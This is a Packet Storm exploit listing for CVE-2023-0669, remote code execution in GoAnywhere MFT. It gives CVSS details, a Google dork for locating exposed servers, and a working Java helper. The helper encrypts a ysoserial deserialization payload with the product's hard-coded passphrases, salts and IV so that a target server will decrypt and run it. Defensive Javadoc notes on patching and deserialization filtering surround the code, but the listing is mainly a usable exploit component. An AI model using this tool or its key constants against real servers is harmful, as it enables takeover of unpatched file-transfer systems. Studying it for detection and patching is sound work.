packetstorm · Youssef Muhammad · PACKETSTORM:171789
History: Apr 10, 2023 - 12:00 a.m.

Goanywhere Encryption Helper 7.1.1 Remote Code Execution

2023-04-10 00:00:00
Youssef Muhammad
packetstormsecurity.com
149

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

`// Exploit Title: Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE)  
// Google Dork: title:"GoAnywhere"   
// Date: 3/26/2023  
// Exploit Author: Youssef Muhammad  
// Vendor Homepage: https://www.goanywhere.com/  
// Software Link: https://www.dropbox.com/s/j31l8lgvapbopy3/ga7_0_3_linux_x64.sh?dl=0  
// Version: > 7.1.1 for windows / > 7.0.3 for Linux   
// Tested on: Windows, Linux  
// CVE : CVE-2023-0669  
// This script is needed to encrypt the serialized payload generated by the ysoserial tool in order to achieve Remote Code Execution   
  
import java.util.Base64;  
import javax.crypto.Cipher;  
import java.nio.charset.StandardCharsets;  
import javax.crypto.SecretKeyFactory;  
import javax.crypto.spec.PBEKeySpec;  
import javax.crypto.spec.IvParameterSpec;  
import javax.crypto.spec.SecretKeySpec;  
import java.nio.file.Files;  
import java.nio.file.Paths;  
/**
 * Companion tool from the advisory for CVE-2023-0669: AES-encrypts a file and prints it as URL-safe Base64.
 *
 * <p>What this listing shows a defender: every input to the cipher is a constant. The passphrase,
 * salt, PBKDF2 iteration count and the IV are literals below, and the listing's header says the
 * plaintext is a serialized Java object. Presumably these constants mirror the ones embedded in
 * the product (confirm against the vendor advisory). If so, anyone holding a copy of the software
 * can produce a bundle the server will decrypt, so the encryption provides neither secrecy nor
 * proof of origin. AES-CBC also carries no integrity tag.
 *
 * <p>Review takeaways:
 * <ul>
 *   <li>Apply the vendor's fix for CVE-2023-0669 and keep the administrative interface off
 *       untrusted networks.</li>
 *   <li>On the receiving side, treat decrypted data as untrusted: verify a signature made with a
 *       key that is not shipped in the product, and restrict deserialization with an allow-list
 *       such as {@code ObjectInputFilter}.</li>
 *   <li>For hunting, the output is a URL-safe Base64 blob that carries a literal {@code $2}
 *       suffix in the second format.</li>
 * </ul>
 */
public class CVE_2023_0669_helper {
    /** Cipher transformation: AES in CBC mode, PKCS#5 padding, no authentication tag. */
    static String ALGORITHM = "AES/CBC/PKCS5Padding";

    /** Holds the key derived by the most recent {@link #encrypt} call; overwritten on every call. */
    static byte[] KEY = new byte[30];

    /** Fixed 16-byte IV: identical plaintext prefixes always yield identical ciphertext prefixes. */
    static byte[] IV = "AES/CBC/PKCS5Pad".getBytes(StandardCharsets.UTF_8);

    /**
     * Reads the file named by the first argument, encrypts it in the format selected by the
     * second argument, and prints the encoded result on standard output.
     *
     * @param args {@code <file_path> <version>}; any other argument count prints usage and exits 1
     * @throws Exception if the file cannot be read or the cipher cannot be set up
     */
    public static void main(String[] args) throws Exception {
        if (args.length != 2) {
            System.out.println("Usage: java CVE_2023_0669_helper <file_path> <version>");
            System.exit(1);
        }
        byte[] input = Files.readAllBytes(Paths.get(args[0]));
        System.out.println(encrypt(input, args[1]));
    }

    /**
     * Encrypts {@code data} with the constant-derived key and the fixed IV.
     *
     * @param data bytes to encrypt
     * @param version {@code "2"} selects the second constant set and appends {@code $2}; every
     *     other value selects the first set with no suffix
     * @return padded URL-safe Base64 of the ciphertext, plus the optional {@code $2} marker
     * @throws Exception on any JCA failure
     */
    public static String encrypt(byte[] data, String version) throws Exception {
        Cipher aesCbc = Cipher.getInstance(ALGORITHM);
        boolean secondFormat = version.equals("2");
        if (secondFormat) {
            KEY = getInitializationValueV2();
        } else {
            KEY = getInitializationValue();
        }
        aesCbc.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(KEY, "AES"), new IvParameterSpec(IV));
        String encoded = Base64.getUrlEncoder().encodeToString(aesCbc.doFinal(data));
        return secondFormat ? encoded + "$2" : encoded;
    }

    /** Derives the 256-bit key for the first format from its hard-coded passphrase and salt. */
    private static byte[] getInitializationValue() throws Exception {
        byte[] salt = {-19, 45, -32, -73, 65, 123, -7, 85};
        return deriveKey("go@nywhereLicenseP@$$wrd", salt, 9535);
    }

    /** Derives the 256-bit key for the second format from its hard-coded passphrase and salt. */
    private static byte[] getInitializationValueV2() throws Exception {
        byte[] salt = {99, 76, 71, 87, 49, 74, 119, 83, 109, 112, 50, 75, 104, 107, 56, 73};
        return deriveKey("pFRgrOMhauusY2ZDShTsqq2oZXKtoW7R", salt, 3392);
    }

    /**
     * Runs PBKDF2-HMAC-SHA1 over constant inputs and returns 32 key bytes.
     *
     * <p>Because passphrase, salt and iteration count never vary, the result is the same on
     * every run. The key-stretching adds no secrecy here.
     */
    private static byte[] deriveKey(String passphrase, byte[] salt, int iterations) throws Exception {
        SecretKeyFactory pbkdf2 = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1");
        // Round trip through the platform charset is kept exactly as the listing has it.
        char[] secret = new String(passphrase.getBytes(), "UTF-8").toCharArray();
        return pbkdf2.generateSecret(new PBEKeySpec(secret, salt, iterations, 256)).getEncoded();
    }
}
  
  
`
